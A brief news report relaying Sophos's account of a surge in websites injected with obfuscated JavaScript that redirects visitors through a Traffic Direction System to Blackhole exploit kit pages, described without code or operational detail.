Cybersecurity firm notes spike in TDS attacks

A computer security firm has noted a spike in site defacement attacks caused by Mal/Iframe-Gen, where legitimate sites are hacked to redirect users to malware. Sophos said the surge that started at (UTC+1) Monday (9 a.m. in Manila). "All the affected sites were injected with malicious JavaScript, heavily obfuscated in an attempt to evade detection (as we expect nowadays)," it said in a blog post. So far, it said visitors to the infected sites were found to have been redirected to a Blackhole exploit pack site, where the victim is bombarded with the usual Flash, Java and PDF exploits. It said the payload of the injected script is to write an iframe to the page, and bounce the traffic elsewhere. The bouncing of traffic is commonly known as a Traffic Direction System (TDS). "The TDS server is under the control of the attackers, enabling them to configure it to redirect user traffic to wherever required," it said. Sophos said much of the iframe traffic was redirected to a page on a freshly registered domain hosted in Germany. However, it said a check of the domain showed the page was unavailable, with all requests getting a 404 error. Later in the day, the TDS server was updated to redirect the traffic to a new destination. It said this indicates user traffic may have become a commodity. "Once they have injected numerous sites to redirect to their TDS, the attacker can essentially sell that user traffic to interested parties, willing to pay for victims to hit their exploit sites," it said. — TJD, GMA News